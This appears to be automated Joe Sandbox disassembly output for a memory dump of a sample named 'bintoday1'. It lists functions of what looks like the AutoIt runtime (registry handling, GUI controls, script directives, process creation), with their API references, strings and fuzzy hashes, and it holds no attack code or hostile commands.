REG_EXPAND_SZ, xrefs: 00C1C5CD
REG_DWORD, xrefs: 00C1C804
REG_QWORD, xrefs: 00C1C8C3
REG_BINARY, xrefs: 00C1C913

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 2f73efba17e5a58673fb22ec42dbea13061ec5e367813620a0d0c72b493c54b2
Instruction ID: c91f46d5710a6e726e119d3ca98a72666073079eaec6f14694360acfbe4a5af3
Opcode Fuzzy Hash: 2f73efba17e5a58673fb22ec42dbea13061ec5e367813620a0d0c72b493c54b2
Instruction Fuzzy Hash: E7128B356182009FDB14DF14C891B6AB7E5FF89714F0588ACF85A9B3A2DB31ED41DB81

Function 00C2091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C209C6
_wcslen.LIBCMT ref: 00C20A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C20A54
_wcslen.LIBCMT ref: 00C20A8A
_wcslen.LIBCMT ref: 00C20B06
_wcslen.LIBCMT ref: 00C20B81

Part of subcall function 00BAF9F2: _wcslen.LIBCMT ref: 00BAF9FD

Part of subcall function 00BF2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BF2BFA

Strings

EXISTS, xrefs: 00C20B7C, 00C20B97
EXPAND, xrefs: 00C20BF8
GETITEMCOUNT, xrefs: 00C20C1E
UNCHECK, xrefs: 00C20D3E
COLLAPSE, xrefs: 00C20B01, 00C20B1C
CHECK, xrefs: 00C20A85, 00C20AA0
ISCHECKED, xrefs: 00C20CE1
SELECT, xrefs: 00C20D11
GETSELECTED, xrefs: 00C20C4E
GETTEXT, xrefs: 00C20C97
GETTOTALCOUNT, xrefs: 00C209F2, 00C20A17

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 741d31f15ad3c65a82c978da5f8b3c2e18fb2a2e2b598206732e8d377aa5e65f
Instruction ID: babc4ed9e0345cffd522f29035ac31e9faec7513796313e086ab88e84c74c00d
Opcode Fuzzy Hash: 741d31f15ad3c65a82c978da5f8b3c2e18fb2a2e2b598206732e8d377aa5e65f
Instruction Fuzzy Hash: 49E1B2352083118FCB14DF25D45092AB7E1FF98314F6589AEF8A65B762DB30EE49CB81

Function 00C1C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C1B6AE,?,?), ref: 00C1C9B5
_wcslen.LIBCMT ref: 00C1C9F1
_wcslen.LIBCMT ref: 00C1CA68
_wcslen.LIBCMT ref: 00C1CA9E
_wcslen.LIBCMT ref: 00C1CAF9
_wcslen.LIBCMT ref: 00C1CB2F
_wcslen.LIBCMT ref: 00C1CB7F

Strings

HKEY_USERS, xrefs: 00C1CBDF
HKEY_CURRENT_USER, xrefs: 00C1CBBD
HKLM, xrefs: 00C1CA98, 00C1CA9D
HKU, xrefs: 00C1CBF0
HKEY_LOCAL_MACHINE, xrefs: 00C1CA62, 00C1CA67
HKCC, xrefs: 00C1CBAC
HKEY_CLASSES_ROOT, xrefs: 00C1CAF3, 00C1CAF8
HKCR, xrefs: 00C1CB29, 00C1CB2E
HKCU, xrefs: 00C1CBCE
HKEY_CURRENT_CONFIG, xrefs: 00C1CB79, 00C1CB7E

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 8ddd39f0301f064808725449aae6b1f7ae8f2388f044e31e051ac5283f5f0aac
Instruction ID: b9d915b972ae963984d9fdfa5bebb0dee042fd94699e424f7021bde54d846d2a
Opcode Fuzzy Hash: 8ddd39f0301f064808725449aae6b1f7ae8f2388f044e31e051ac5283f5f0aac
Instruction Fuzzy Hash: 8371E33268412A8BCF21DE68D9D15FF3391AF66754B250268FC7697284E631CEC5E3A0

Function 00C2833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C2835A
_wcslen.LIBCMT ref: 00C2836E
_wcslen.LIBCMT ref: 00C28391
_wcslen.LIBCMT ref: 00C283B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C283F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C25BF2), ref: 00C2844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C28487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C284CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C28501
FreeLibrary.KERNEL32(?), ref: 00C2850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C2851D
DestroyIcon.USER32(?,?,?,?,?,00C25BF2), ref: 00C2852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C28549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C28555

Strings

.exe, xrefs: 00C28388
.icl, xrefs: 00C28368
.dll, xrefs: 00C283AB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 365ac7587b12857fb9503c7c3890dceee56cc213d12c2bc0316fc2c54cb607d0
Instruction ID: a98227e8f46ae89e712c1e939c4d674212c64973a8bd451389fc2d3042eec92f
Opcode Fuzzy Hash: 365ac7587b12857fb9503c7c3890dceee56cc213d12c2bc0316fc2c54cb607d0
Instruction Fuzzy Hash: 5D61ED71510225BFEB24DF64EC81BBE77A8BF08B11F104259F825D64D1DBB4EA84CBA0

Function 00B97778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#notrayicon, xrefs: 00B977E7
#requireadmin, xrefs: 00B977FF
#ce, xrefs: 00B978ED
#include, xrefs: 00B97847
Cannot parse #include, xrefs: 00BD5279
#comments-start, xrefs: 00B9785F, 00B978B1
Bad directive syntax error, xrefs: 00BD519A
", xrefs: 00BD5153
#pragma compile, xrefs: 00B977D3
#include-once, xrefs: 00B9782F
#comments-end, xrefs: 00B978D9
Unterminated group of comments, xrefs: 00BD528C
#cs, xrefs: 00B97873, 00B978C5
', xrefs: 00BD5169
#OnAutoItStartRegister, xrefs: 00B97817

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 4ba85afa2372199957290d6c6f4eda2a2efa72e461b422631cb7edebcfe610e4
Instruction ID: bf6ad9c6cef17ea8dca7754afef4c14f556914f691d2248c889d45c0fe516f2e
Opcode Fuzzy Hash: 4ba85afa2372199957290d6c6f4eda2a2efa72e461b422631cb7edebcfe610e4
Instruction Fuzzy Hash: 6781DF71694605ABDF24AFA0DC82FBE77E9EF15300F0440B5F805AA292EF74DA15C6A1

Function 00BF5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00BF5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00BF5A40
SetWindowTextW.USER32(?,?), ref: 00BF5A57
GetDlgItem.USER32(?,000003EA), ref: 00BF5A6C
SetWindowTextW.USER32(00000000,?), ref: 00BF5A72
GetDlgItem.USER32(?,000003E9), ref: 00BF5A82
SetWindowTextW.USER32(00000000,?), ref: 00BF5A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00BF5AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00BF5AC3
GetWindowRect.USER32(?,?), ref: 00BF5ACC
_wcslen.LIBCMT ref: 00BF5B33
SetWindowTextW.USER32(?,?), ref: 00BF5B6F
GetDesktopWindow.USER32 ref: 00BF5B75
GetWindowRect.USER32(00000000), ref: 00BF5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00BF5BD3
GetClientRect.USER32(?,?), ref: 00BF5BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00BF5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00BF5C2F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: d539819176dd0025fffb454f1cfbf27df11e5519c6c167641cc2f77b31184abd
Instruction ID: 4fc16457c6378824dbc51173c685768041caeba5d32836a5140a3354a393ebaa
Opcode Fuzzy Hash: d539819176dd0025fffb454f1cfbf27df11e5519c6c167641cc2f77b31184abd
Instruction Fuzzy Hash: 4C713A31900B09AFDB30DFA8CE85BAEBBF5FF48705F104558E682A35A0D775A949CB50

Function 00BB00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00BB00C6

Part of subcall function 00BB00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00C6070C,00000FA0,7D08D0D6,?,?,?,?,00BD23B3,000000FF), ref: 00BB011C
Part of subcall function 00BB00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00BD23B3,000000FF), ref: 00BB0127
Part of subcall function 00BB00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00BD23B3,000000FF), ref: 00BB0138
Part of subcall function 00BB00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00BB014E
Part of subcall function 00BB00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00BB015C
Part of subcall function 00BB00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00BB016A
Part of subcall function 00BB00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BB0195
Part of subcall function 00BB00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BB01A0

___scrt_fastfail.LIBCMT ref: 00BB00E7

Part of subcall function 00BB00A3: __onexit.LIBCMT ref: 00BB00A9

Strings

WakeAllConditionVariable, xrefs: 00BB0162
InitializeConditionVariable, xrefs: 00BB0148
SleepConditionVariableCS, xrefs: 00BB0154
kernel32.dll, xrefs: 00BB0133
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00BB0122

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: e8084637911bfb08d710ec22be3db12de3b3c89a4f36d5f208ad10eb055ccdb1
Instruction ID: 4664affe84f8b848aac0f0ecb9aaccb99f449fdfa3e2358b996aac5c50bb4f17
Opcode Fuzzy Hash: e8084637911bfb08d710ec22be3db12de3b3c89a4f36d5f208ad10eb055ccdb1
Instruction Fuzzy Hash: B021F932A647156BD7347BA8AC46BBF73E4EF05B51F10057AF801B2A91DFF098018A90

Function 00BF30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BF318D
_wcslen.LIBCMT ref: 00BF31F8

Strings

REGEXPCLASS, xrefs: 00BF3255, 00BF3266
TEXT, xrefs: 00BF347C
CLASS, xrefs: 00BF3188, 00BF31A5
CLASSNN, xrefs: 00BF31F3, 00BF3204
INSTANCE, xrefs: 00BF3453
NAME, xrefs: 00BF3335, 00BF3346

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 51aea28a67143d91223270ba196447b06b74cb32b5c2f0f3a2ba0db7cbebfb36
Instruction ID: d2699fdba8e62ed4abe86f81d9bdb8691c3156d7c2d95b96e75f1321dab2f56b
Opcode Fuzzy Hash: 51aea28a67143d91223270ba196447b06b74cb32b5c2f0f3a2ba0db7cbebfb36
Instruction Fuzzy Hash: 79E19432A0051A9BCF14DFB8C4916FDBBF4FF54B50F5481A9EA56A7240DB30AE8D8790

Function 00C044C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00C2CC08), ref: 00C04527
_wcslen.LIBCMT ref: 00C0453B
_wcslen.LIBCMT ref: 00C04599
_wcslen.LIBCMT ref: 00C045F4
_wcslen.LIBCMT ref: 00C0463F
_wcslen.LIBCMT ref: 00C046A7

Part of subcall function 00BAF9F2: _wcslen.LIBCMT ref: 00BAF9FD

GetDriveTypeW.KERNEL32(?,00C56BF0,00000061), ref: 00C04743

Strings

cdrom, xrefs: 00C0458F, 00C04594
ramdisk, xrefs: 00C046F1
removable, xrefs: 00C045EA, 00C045EF
fixed, xrefs: 00C04635, 00C0463A
network, xrefs: 00C0469D, 00C046A2
unknown, xrefs: 00C04708
all, xrefs: 00C04531, 00C04536

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 000f8c27566a4f76eda3ab7ef4fdeee23b963c69c3a3e15d36ef3d9c641218a9
Instruction ID: df2f27bd4efb94d784b0724cca97747938fcc9ae398a09282af5aee5478ddade
Opcode Fuzzy Hash: 000f8c27566a4f76eda3ab7ef4fdeee23b963c69c3a3e15d36ef3d9c641218a9
Instruction Fuzzy Hash: 5FB1D2B16083029FC718DF28C890A7BB7E5AFA5750F50492DF6A6C72D1E731DA44CB52

Function 00C1AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C1B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C1B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C1B1D4
_wcslen.LIBCMT ref: 00C1B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C1B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C1B236
_wcslen.LIBCMT ref: 00C1B332

Part of subcall function 00C005A7: GetStdHandle.KERNEL32(000000F6), ref: 00C005C6

_wcslen.LIBCMT ref: 00C1B34B
_wcslen.LIBCMT ref: 00C1B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C1B3B6
GetLastError.KERNEL32(00000000), ref: 00C1B407
CloseHandle.KERNEL32(?), ref: 00C1B439
CloseHandle.KERNEL32(00000000), ref: 00C1B44A
CloseHandle.KERNEL32(00000000), ref: 00C1B45C
CloseHandle.KERNEL32(00000000), ref: 00C1B46E
CloseHandle.KERNEL32(?), ref: 00C1B4E3

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: be04bc4b0210e26bb19fb3272c5ff6b1481c0749569c617ce244f027d4469f35
Instruction ID: 93a050df4b2c8fd40504d1ed102c533670ca6b12120973ad45a2e1c73b0861a3
Opcode Fuzzy Hash: be04bc4b0210e26bb19fb3272c5ff6b1481c0749569c617ce244f027d4469f35
Instruction Fuzzy Hash: EBF19D715083409FCB14EF24C891BAEBBE1AF86310F14899DF4999B2A2DB31ED44DF52

Function 00B9326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00C61990), ref: 00BD2F8D
GetMenuItemCount.USER32(00C61990), ref: 00BD303D
GetCursorPos.USER32(?), ref: 00BD3081
SetForegroundWindow.USER32(00000000), ref: 00BD308A
TrackPopupMenuEx.USER32(00C61990,00000000,?,00000000,00000000,00000000), ref: 00BD309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BD30A9

Strings

0, xrefs: 00B9327D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 978dee74dcac552e8680a84970ed48d80e30a918b0966d5143d99aaad7e91ede
Instruction ID: f55f4025339dbd13fa540c7a2d5b1e8e45891e2c943eb941fc2d97eb2a4e724c
Opcode Fuzzy Hash: 978dee74dcac552e8680a84970ed48d80e30a918b0966d5143d99aaad7e91ede
Instruction Fuzzy Hash: AD710631644245BEEB218F24CC89FAEFFE4FF05724F2402A6F5146A2E1D7B1A910DB90

Function 00C26CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00C26DEB

Part of subcall function 00B96B57: _wcslen.LIBCMT ref: 00B96B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C26E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C26E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C26E94
DestroyWindow.USER32(?), ref: 00C26EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B90000,00000000), ref: 00C26EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C26EFD
GetDesktopWindow.USER32 ref: 00C26F16
GetWindowRect.USER32(00000000), ref: 00C26F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C26F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C26F4D

Part of subcall function 00BA9944: GetWindowLongW.USER32(?,000000EB), ref: 00BA9952

Strings

0, xrefs: 00C26D98
tooltips_class32, xrefs: 00C26E58, 00C26EDD

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 804d8280c9004a2fe4f4c1e1809a683e6258f54ae8c58d6a79a98954b2e45282
Instruction ID: ff3b26fffd4848922b3f56462345ee00a91c5ca7f43ea7057217e96350e33bd0
Opcode Fuzzy Hash: 804d8280c9004a2fe4f4c1e1809a683e6258f54ae8c58d6a79a98954b2e45282
Instruction Fuzzy Hash: 83716774104244AFDB21CF58EC84FAABBF9FB89304F18041DF99997661C770AA06CF21

Function 00C2911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA9BB2

DragQueryPoint.SHELL32(?,?), ref: 00C29147

Part of subcall function 00C27674: ClientToScreen.USER32(?,?), ref: 00C2769A
Part of subcall function 00C27674: GetWindowRect.USER32(?,?), ref: 00C27710
Part of subcall function 00C27674: PtInRect.USER32(?,?,00C28B89), ref: 00C27720

SendMessageW.USER32(?,000000B0,?,?), ref: 00C291B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C291BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C291DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C29225
SendMessageW.USER32(?,000000B0,?,?), ref: 00C2923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00C29255
SendMessageW.USER32(?,000000B1,?,?), ref: 00C29277
DragFinish.SHELL32(?), ref: 00C2927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C29371

Strings

@GUI_DRAGID, xrefs: 00C292E9
@GUI_DROPID, xrefs: 00C2929E
@GUI_DRAGFILE, xrefs: 00C29320

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
